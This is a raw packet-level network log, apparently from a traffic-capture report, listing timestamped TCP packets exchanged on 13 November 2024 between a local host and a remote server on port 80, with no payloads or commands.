                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039685965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039757013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039778948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039942026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039958000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039983034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039983988 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.039999008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040014029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040045977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040060997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040087938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040183067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040210962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040225983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040260077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040306091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040322065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040337086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040338993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040354967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040366888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040374994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040390015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040401936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040519953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040596962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040623903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040637016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040694952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040710926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040719032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040728092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040744066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040782928 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040827990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040908098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040924072 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040950060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040981054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.040997028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041023970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041068077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041094065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041109085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041112900 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041186094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041204929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041220903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041237116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041261911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041261911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041279078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041292906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041309118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041321039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041325092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041351080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041450024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041467905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041564941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041580915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041595936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041631937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041631937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041634083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041651964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041666985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041692972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041695118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041708946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041726112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041737080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041740894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041758060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041769028 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041835070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041851044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041865110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041867018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.041934967 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.086811066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091722012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091739893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091754913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091795921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091844082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091882944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091927052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091943979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091984034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.091995955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092011929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092026949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092042923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092046022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092082024 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092170000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092185020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092200994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092217922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092221975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092236042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092252016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092261076 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092287064 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092293024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092308998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092324972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.092363119 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.123167038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.123182058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.123198032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.123210907 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.123213053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.123234987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.132421017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.132436991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.132452965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.132466078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.132494926 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.133430958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.133457899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.133475065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.133503914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.133523941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.133539915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.133554935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.133554935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.133589983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153022051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153058052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153074026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153090000 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153116941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153119087 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153134108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153148890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153162003 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153177023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153183937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153194904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153211117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153228998 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153240919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153240919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153259039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153275967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153290033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153299093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153305054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153321028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153335094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153336048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153357983 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153362989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153378010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153393984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153399944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153412104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153429985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153431892 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153445005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153464079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153470039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153481960 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153496027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153500080 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153513908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153527021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153541088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153552055 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153557062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153573990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153585911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153589964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153599977 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153619051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153630972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153635979 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153651953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153669119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153676987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153685093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153714895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153721094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153731108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153748035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153753996 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153765917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153781891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153786898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153790951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153810024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153820038 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153825045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153847933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153851986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153875113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153888941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153889894 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153918982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153934956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153956890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153960943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153976917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153983116 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.153992891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154016972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154021978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154037952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154052019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154058933 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154067039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154082060 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154088974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154099941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154113054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154139042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154146910 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154161930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154175043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154177904 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154196024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154200077 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154222012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154239893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154242039 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154253006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154269934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154273987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154393911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154485941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154500008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154516935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154547930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154586077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154613018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154625893 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154628038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154661894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154680014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154689074 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154697895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154716015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154717922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154733896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154752016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154808998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154824972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154841900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154858112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154860020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154908895 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154934883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154962063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154977083 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.154978037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155019999 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155023098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155040026 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155093908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155199051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155213118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155251980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155257940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155301094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155330896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155347109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155389071 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155421972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155426025 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155477047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155494928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155533075 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155545950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155563116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155577898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155607939 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155620098 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155638933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155667067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155680895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155735970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155770063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155807018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155817032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:20.155833006 CET804973342.96.10.8192.168.2.4
